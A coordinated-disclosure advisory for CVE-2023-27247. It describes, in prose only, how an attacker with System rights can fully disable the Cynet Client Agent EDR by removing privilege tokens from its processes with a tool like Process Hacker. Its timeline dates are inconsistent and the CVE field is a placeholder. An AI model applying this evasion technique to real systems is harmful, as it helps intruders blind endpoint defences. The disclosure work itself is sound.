CVE-2023-27247: CVEs/Readme.md at main · NF-Security-Team/CVEs

Coordinated Disclosure Timeline

22/12/2022: Report submission to Vendor via Direct Email to Research & Develop
19/01/2023: Vendor acknowledged CVE and has been notified of my intention to publish the advisory
26/02/2022: CVE submission sent to MITRE.org

Executive Summary

An issue found in “Cynet Client Agent” Ver 4.6.0.8010 allows attackers to completely disable cynet protection modules into the attacked machine having local Administrator or System privileges.

Technical Summary

To exploit the vulnerability an attacker must get System Rights into the machine and use a tool like process hacker that permits him to remove privilege tokens from running processes.

IMPORTANT: this local vulnerability can expose useful information to an attacker willing to escalate his privileges. After a successful attack lateral movement can be done via multiple ways.

Product

Cynet Client Agent

Tested Version

Ver 4.6.0.8010

Details

Issue: Antimalware protection components full disablement

System privileges gained through local administrator account permits to seamlessly disable the whole EDR protection capabilities via process’ privilege tokens disablement

Impact

EDR Protection fully disabled on the system

CVE

CVE-XXXX-XXXXXX

Credit

This issue was discovered and reported by Nicolas Fasolo (@Err0r0x41414141)

Contact

You can contact me at [email protected], please include a reference to CVE-XXXX-XXXXXX in any communication regarding this topic.